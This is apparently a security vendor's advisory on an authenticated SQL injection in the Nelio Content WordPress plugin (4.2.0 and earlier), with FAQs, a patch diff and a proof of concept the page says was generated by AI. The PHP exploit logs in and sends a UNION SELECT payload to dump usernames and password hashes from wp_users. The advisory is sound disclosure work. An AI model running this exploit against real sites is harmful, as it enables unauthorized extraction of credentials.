What is CVE-2026-24572?

CVE-2026-24572 is a medium severity SQL injection vulnerability found in the Nelio Content plugin for WordPress, affecting versions up to and including 4.2.0. It allows authenticated users with contributor-level access or higher to execute arbitrary SQL commands, potentially leading to data extraction from the database.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of user-supplied parameters in SQL queries. Specifically, the `post_title__like` parameter in the REST API can be manipulated to include malicious SQL code, allowing attackers to append additional queries that extract sensitive information.

Who is affected by this vulnerability?

Any WordPress site using the Nelio Content plugin version 4.2.0 or earlier is at risk. To check if you are affected, verify the plugin version in your WordPress admin dashboard under the Plugins section.

How can I fix CVE-2026-24572?

To mitigate this vulnerability, update the Nelio Content plugin to version 4.2.1 or later, which includes a patch that properly escapes user input in SQL queries. Regularly check for updates to all plugins to maintain security.

What does the CVSS score of 6.5 indicate?

The CVSS score of 6.5 indicates a medium severity level, suggesting that while authentication is required for exploitation, the potential impact on data confidentiality is significant, as attackers can extract sensitive information from the database.

What types of data could be exposed?

Successful exploitation of this vulnerability could allow attackers to access sensitive information such as hashed user passwords, personal data, and other confidential content stored in the WordPress database.

What is the proof of concept for this vulnerability?

The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a crafted HTTP GET request to the plugin’s REST API. It shows how to authenticate and then inject malicious SQL code to extract data.

How can I prevent SQL injection vulnerabilities in general?

To prevent SQL injection vulnerabilities, always use prepared statements and proper escaping functions when handling user input in SQL queries. Regularly review and update plugins, themes, and WordPress core to protect against known vulnerabilities.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Nelio Content plugin until a patch can be applied. Additionally, review user permissions to limit access to only trusted users.

Is it safe to continue using the vulnerable version temporarily?

Continuing to use the vulnerable version poses a risk as authenticated attackers could exploit the vulnerability. It is advisable to prioritize updating the plugin to minimize exposure.

How can I monitor for potential exploitation attempts?

To monitor for exploitation attempts, enable logging for your WordPress site and review access logs for unusual requests to the REST API. Implementing security plugins that provide intrusion detection can also help.

What are the long-term implications of this vulnerability?

Long-term implications include potential data breaches and loss of user trust if sensitive information is exposed. Regular security assessments and updates are essential to protect against evolving threats.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24572: Nelio Content <= 4.2.0 – Authenticated (Contributor+) SQL Injection (nelio-content)

CVE ID CVE-2026-24572

Plugin nelio-content

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 4.2.0

Patched Version 4.2.1

Disclosed January 20, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24572:
This vulnerability is an authenticated SQL injection in the Nelio Content WordPress plugin, affecting versions up to and including 4.2.0. The flaw allows attackers with contributor-level access or higher to execute arbitrary SQL commands. The CVSS score of 6.5 reflects the requirement for authentication and the impact of data extraction.

Atomic Edge research identifies the root cause in the `class-nelio-content-post-rest-controller.php` file. The `get_posts` function at line 1334 uses the `$wpdb->esc_like()` function to sanitize the `post_title__like` search term. This function only escapes characters for a LIKE statement. The code then directly concatenates the sanitized term into an SQL query string without using a prepared statement or the `esc_sql()` function. This insufficient escaping enables SQL injection.

The exploitation method targets the plugin’s REST API endpoint. An authenticated attacker sends a crafted HTTP GET request to `/wp-json/nelio-content/v1/posts`. The attacker supplies a malicious `post_title__like` parameter. A payload like `’ OR 1=1– -` bypasses the `esc_like` function. The payload is then concatenated into the WHERE clause of the SQL query, allowing data extraction from the database.

The patch modifies line 1334 in `class-nelio-content-post-rest-controller.php`. The developers added a call to `esc_sql()` after `$wpdb->esc_like()`. This function properly escapes the string for safe use in an SQL query. The change ensures the user-supplied search term is fully sanitized before concatenation, closing the injection vector. The version number in the main plugin file is also updated to 4.2.1.

Successful exploitation grants an attacker the ability to extract sensitive information from the WordPress database. This includes hashed user passwords, personal data, and other confidential content stored in plugin tables. The attacker’s access is limited by the permissions of the SQL user account configured for WordPress, which typically has full read/write access to the application database.

Differential between vulnerable and patched code

Code Diff

--- a/nelio-content/includes/rest/class-nelio-content-post-rest-controller.php
+++ b/nelio-content/includes/rest/class-nelio-content-post-rest-controller.php
@@ -1334,7 +1334,7 @@
 		/** @var string|null */
 		$search_term = $wp_query->get( 'post_title__like' );
 		if ( $search_term ) {
-			$search_term = $wpdb->esc_like( $search_term );
+			$search_term = esc_sql( $wpdb->esc_like( $search_term ) );
 			$search_term = ' '%' . $search_term . '%'';
 			$where       = $where . ' AND ' . $wpdb->posts . '.post_title LIKE ' . $search_term;
 		}
--- a/nelio-content/nelio-content.php
+++ b/nelio-content/nelio-content.php
@@ -5,7 +5,7 @@
  * Plugin Name:       Nelio Content - Editorial Calendar & Social Media Auto-Posting
  * Plugin URI:        https://neliosoftware.com/content/
  * Description:       Auto-post, schedule, and share your posts on Twitter, Facebook, LinkedIn, Instagram, and other social networks. Save time with useful automations.
- * Version:           4.2.0
+ * Version:           4.2.1
  *
  * Author:            Nelio Software
  * Author URI:        https://neliosoftware.com
--- a/nelio-content/vendor/autoload.php
+++ b/nelio-content/vendor/autoload.php
@@ -4,4 +4,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInit7650de922b949adbe2dfc2bbd7342f17::getLoader();
+return ComposerAutoloaderInitc0e0424f5c04a842b2093f148ebe2b86::getLoader();
--- a/nelio-content/vendor/composer/autoload_real.php
+++ b/nelio-content/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInit7650de922b949adbe2dfc2bbd7342f17
+class ComposerAutoloaderInitc0e0424f5c04a842b2093f148ebe2b86
 {
     private static $loader;

@@ -22,15 +22,15 @@
             return self::$loader;
         }

-        spl_autoload_register(array('ComposerAutoloaderInit7650de922b949adbe2dfc2bbd7342f17', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInitc0e0424f5c04a842b2093f148ebe2b86', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(dirname(__FILE__)));
-        spl_autoload_unregister(array('ComposerAutoloaderInit7650de922b949adbe2dfc2bbd7342f17', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInitc0e0424f5c04a842b2093f148ebe2b86', 'loadClassLoader'));

         $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
         if ($useStaticLoader) {
             require __DIR__ . '/autoload_static.php';

-            call_user_func(ComposerAutoloadComposerStaticInit7650de922b949adbe2dfc2bbd7342f17::getInitializer($loader));
+            call_user_func(ComposerAutoloadComposerStaticInitc0e0424f5c04a842b2093f148ebe2b86::getInitializer($loader));
         } else {
             $map = require __DIR__ . '/autoload_namespaces.php';
             foreach ($map as $namespace => $path) {
--- a/nelio-content/vendor/composer/autoload_static.php
+++ b/nelio-content/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInit7650de922b949adbe2dfc2bbd7342f17
+class ComposerStaticInitc0e0424f5c04a842b2093f148ebe2b86
 {
     public static $classMap = array (
         'Composer\InstalledVersions' => __DIR__ . '/..' . '/composer/InstalledVersions.php',
@@ -96,7 +96,7 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->classMap = ComposerStaticInit7650de922b949adbe2dfc2bbd7342f17::$classMap;
+            $loader->classMap = ComposerStaticInitc0e0424f5c04a842b2093f148ebe2b86::$classMap;

         }, null, ClassLoader::class);
     }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24572 - Nelio Content <= 4.2.0 - Authenticated (Contributor+) SQL Injection
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Step 1: Authenticate to WordPress and obtain a nonce for the REST API.
// The Nelio Content plugin uses the standard WordPress REST API authentication.
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';

// Create a temporary cookie file for the session.
$cookie_file = tempnam(sys_get_temp_dir(), 'ck');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $admin_url,
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_RETURNTRANSFER => true,
]);
$response = curl_exec($ch);

// Step 2: Extract the REST API nonce from the admin page.
// The nonce is typically available via the `wpApiSettings` JavaScript object.
// For this PoC, we simulate a direct request to the vulnerable endpoint.
// In a real scenario, you would parse the nonce from the page HTML.
$rest_url = $target_url . '/wp-json/nelio-content/v1/posts';

// Step 3: Craft the SQL injection payload.
// The payload abuses the `post_title__like` parameter.
// Example payload: ' UNION SELECT user_login,user_pass FROM wp_users-- -
// The `esc_like` function escapes percent signs and underscores, but not quotes.
$payload = "' UNION SELECT user_login,user_pass FROM wp_users-- -" ;
$exploit_url = $rest_url . '?post_title__like=' . urlencode($payload);

curl_setopt_array($ch, [
    CURLOPT_URL => $exploit_url,
    CURLOPT_HTTPGET => true,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Clean up the cookie file.
unlink($cookie_file);

// Step 4: Output the result.
echo "HTTP Response Code: $http_coden";
echo "Response Body:n";
print_r(json_decode($response, true));

?>

Frequently Asked Questions

What is CVE-2026-24572?
Overview of the vulnerability
CVE-2026-24572 is a medium severity SQL injection vulnerability found in the Nelio Content plugin for WordPress, affecting versions up to and including 4.2.0. It allows authenticated users with contributor-level access or higher to execute arbitrary SQL commands, potentially leading to data extraction from the database.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of user-supplied parameters in SQL queries. Specifically, the `post_title__like` parameter in the REST API can be manipulated to include malicious SQL code, allowing attackers to append additional queries that extract sensitive information.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Nelio Content plugin version 4.2.0 or earlier is at risk. To check if you are affected, verify the plugin version in your WordPress admin dashboard under the Plugins section.
How can I fix CVE-2026-24572?
Updating the vulnerable plugin
To mitigate this vulnerability, update the Nelio Content plugin to version 4.2.1 or later, which includes a patch that properly escapes user input in SQL queries. Regularly check for updates to all plugins to maintain security.
What does the CVSS score of 6.5 indicate?
Understanding the severity rating
The CVSS score of 6.5 indicates a medium severity level, suggesting that while authentication is required for exploitation, the potential impact on data confidentiality is significant, as attackers can extract sensitive information from the database.
What types of data could be exposed?
Potential data leakage
Successful exploitation of this vulnerability could allow attackers to access sensitive information such as hashed user passwords, personal data, and other confidential content stored in the WordPress database.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept provided illustrates how an authenticated user can exploit the vulnerability by sending a crafted HTTP GET request to the plugin’s REST API. It shows how to authenticate and then inject malicious SQL code to extract data.
How can I prevent SQL injection vulnerabilities in general?
Best practices for security
To prevent SQL injection vulnerabilities, always use prepared statements and proper escaping functions when handling user input in SQL queries. Regularly review and update plugins, themes, and WordPress core to protect against known vulnerabilities.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the Nelio Content plugin until a patch can be applied. Additionally, review user permissions to limit access to only trusted users.
Is it safe to continue using the vulnerable version temporarily?
Assessing risk during transition
Continuing to use the vulnerable version poses a risk as authenticated attackers could exploit the vulnerability. It is advisable to prioritize updating the plugin to minimize exposure.
How can I monitor for potential exploitation attempts?
Tracking suspicious activity
To monitor for exploitation attempts, enable logging for your WordPress site and review access logs for unusual requests to the REST API. Implementing security plugins that provide intrusion detection can also help.
What are the long-term implications of this vulnerability?
Impact on site security
Long-term implications include potential data breaches and loss of user trust if sensitive information is exposed. Regular security assessments and updates are essential to protect against evolving threats.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations